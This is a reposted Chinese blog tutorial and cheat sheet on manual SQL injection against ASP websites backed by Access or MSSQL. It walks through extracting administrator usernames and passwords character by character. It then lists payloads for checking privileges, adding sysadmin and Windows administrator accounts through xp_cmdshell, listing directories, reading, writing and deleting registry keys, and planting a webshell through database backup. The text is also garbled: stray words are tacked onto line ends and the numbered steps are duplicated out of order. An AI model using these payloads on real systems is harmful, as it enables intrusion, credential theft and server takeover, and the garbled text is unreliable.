转载:http://blog.csdn.net/tomatofly/article/details/7221209web
入侵过程主要包括如下几个步骤:sql
一、测试ASP系统是否有注入漏洞;shell
二、获取数据库表名;数据库
三、测试管理员ID;浏览器
四、测试管理员用户名长度和管理员密码长度;函数
五、从高到低依次测试出管理员用户名和密码。 学习
测试ASP系统是否有注入漏洞 这很关键,没有漏洞的网站你就别瞎忙了。方法也很简单,打开ASP网站一个分类网页,如盗帅下载系统中的/list.asp?id=11和逸风系统中的/class.asp?id=18等,在其后面分别加入and 1=1 和and 1=2进行测试,具体形式为/list.asp?id=11 and 1=1 (如下各测试语句都用一样的形式加入,TTY将再也不说明)注意空格。在IE浏览器里空格将自动转换为%20。若是输入and 1=1 能正常显示原页面内容,输入and 1=2不能正常显示原页面内容,就说明有SQL注入漏洞了,能够进行下面的步骤。测试数据库表名 一个数据库里通常有不少表,咱们要找到存放管理员用户名和密码的表。对于已知类型的ASP系统来讲,能够到网上去下载一个压缩包,用辅臣数据库浏览器打开数据库查看就能够了,通常都是admin。不管是否知道表名,都加如下语句测试一下:测试
and 0<>(select count(*) from admin)网站
若是能返回正常页面,说明表名就是admin,不然继续换表名测试。
测试管理员ID 通常网站的管理员不是不少的,ID也不是很大,依次用一、二、3 ... ... 测试,很快.net
就能测到,具体测试语句为:
and (select count(*) from admin where id=1)
变换最后的数字1进行测试,直到能正常返回原页面为止。
测试管理员用户名长度和管理员密码长度 这很重要,不知道用户名和密码是几位数下面的工做就没法进行。
用户名长度: and (select count(*) from admin where id=5 and len(username)=4)
密码长度: and (select count(*) from admin where id=5 and len(pws)=4)
须要注意的是,表里存放用户名的字段username和存放密码的字段pws须要打开数据库进行确认。
最后测试出管理员用户名和密码 从高到低,依次一位一位的测试,直到测出为止:
正在测试用户名的第三位字母 :and (select count(*) from admin where id=5 and left(username,3)='ttd')
正在测试第7位密码:and (select count(*) from admin where id=5 and left(pws,7)='1506411')
好了,若是操做无误的话,你就能够测试出正确的用户名和密码了。立刻到网上去找一个盗帅下载系统或逸风网站系统练习吧!
对于新手来讲,上面的方法能够当作是学习注入原理,实际操做起来是很是累人的,且不说语句是否正确、熟练掌握,单就马拉松式的测试用户名和密码就能累死你,每一位,若是是数字要测试10次,若是是字母要测试26次,若是哪位老兄用户名和密码都用上了!@#$%的话,那你慢慢去测试吧,哈哈哈哈哈!
-------------------------------------
手动注入脚本命令精华版
做者:未知 来源:CnXHacker.Net
1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是不是mssql ;and user>0
3.注入参数是字符’and [查询条件] and ’’=’
4.搜索时没过滤参数的’and [查询条件] and ’%25’=’
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 1.判断是否有注入;and 1=1 ;and 1=2
2.初步判断是不是mssql ;and user>0
3.注入参数是字符’and [查询条件] and ’’=’
4.搜索时没过滤参数的’and [查询条件] and ’%25’=’
5.判断数据库系统
;and (select count(*) from sysobjects)>0 mssql
;and (select count(*) from msysobjects)>0 access
6.猜数据库 ;and (select Count(*) from [数据库名])>0
7.猜字段 ;and (select Count(字段名) from 数据库名)>0
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--
;and 1=(select IS_MEMBER(’db_owner’));--
11.添加mssql和系统的账户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell ’net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--
;exec master.dbo.xp_cmdshell ’net user username password /add’;--
;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ’c:/’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(’上步获得的paths’))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar
(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当前全部驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 得到子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 得到全部子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内
容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’
SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回全部键值
xp_regread 根键,子键,键值名
;exec xp_regread
’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返
回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’
TestValueName’,’reg_sz’,’hello’ 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’
,’TestValueName’ 删除某个值
xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey
’ 删除键,包括该键下全部值
14.mssql的backup建立webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=’c:/l.asp’;
15.mssql内置函数
;and (select @@version)>0 得到Windows的版本号
;and user_name()=’dbo’ 判断当前系统的链接用户是否是sa
;and (select user_name())>0 爆当前系统的链接用户
;and (select db_name())>0 获得当前链接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=’g:/wwwtest/l.asp’;
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0
9.(1)猜字段的ascii值(access)
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0
(2)猜字段的ascii值(mssql)
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
10.测试权限结构(mssql)
;and 1=(select IS_SRVROLEMEMBER(’sysadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’serveradmin’));--
;and 1=(select IS_SRVROLEMEMBER(’setupadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’securityadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’diskadmin’));--
;and 1=(select IS_SRVROLEMEMBER(’bulkadmin’));--
;and 1=(select IS_MEMBER(’db_owner’));--
11.添加mssql和系统的账户
;exec master.dbo.sp_addlogin username;--
;exec master.dbo.sp_password null,username,password;--
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
;exec master.dbo.xp_cmdshell ’net user username password
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add’;--
;exec master.dbo.xp_cmdshell ’net user username password /add’;--
;exec master.dbo.xp_cmdshell ’net localgroup administrators username /add’;--
12.(1)遍历目录
;create table dirs(paths varchar(100), id int)
;insert dirs exec master.dbo.xp_dirtree ’c:/’
;and (select top 1 paths from dirs)>0
;and (select top 1 paths from dirs where paths not in(’上步获得的paths’))>)
(2)遍历目录
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar
(255));--
;insert temp exec master.dbo.xp_availablemedia;-- 得到当前全部驱动器
;insert into temp(id) exec master.dbo.xp_subdirs ’c:/’;-- 得到子目录列表
;insert into temp(id,num1) exec master.dbo.xp_dirtree ’c:/’;-- 得到全部子目录的目录树构
;insert into temp(id) exec master.dbo.xp_cmdshell ’type c:/web/index.asp’;-- 查看文件的内
容
13.mssql中的存储过程
xp_regenumvalues 注册表根键, 子键
;exec xp_regenumvalues ’HKEY_LOCAL_MACHINE’,’
SOFTWARE/Microsoft/Windows/CurrentVersion/Run’ 以多个记录集方式返回全部键值
xp_regread 根键,子键,键值名
;exec xp_regread
’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’CommonFilesDir’ 返
回制定键的值
xp_regwrite 根键,子键, 值名, 值类型, 值
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型
;exec xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’,’
TestValueName’,’reg_sz’,’hello’ 写入注册表
xp_regdeletevalue 根键,子键,值名
exec xp_regdeletevalue ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion’
,’TestValueName’ 删除某个值
xp_regdeletekey ’HKEY_LOCAL_MACHINE’,’SOFTWARE/Microsoft/Windows/CurrentVersion/Testkey
’ 删除键,包括该键下全部值
14.mssql的backup建立webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=’c:/l.asp’;
15.mssql内置函数
;and (select @@version)>0 得到Windows的版本号
;and user_name()=’dbo’ 判断当前系统的链接用户是否是sa
;and (select user_name())>0 爆当前系统的链接用户
;and (select db_name())>0 获得当前链接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (’’);
backup database model to disk=’g:/wwwtest/l.asp’;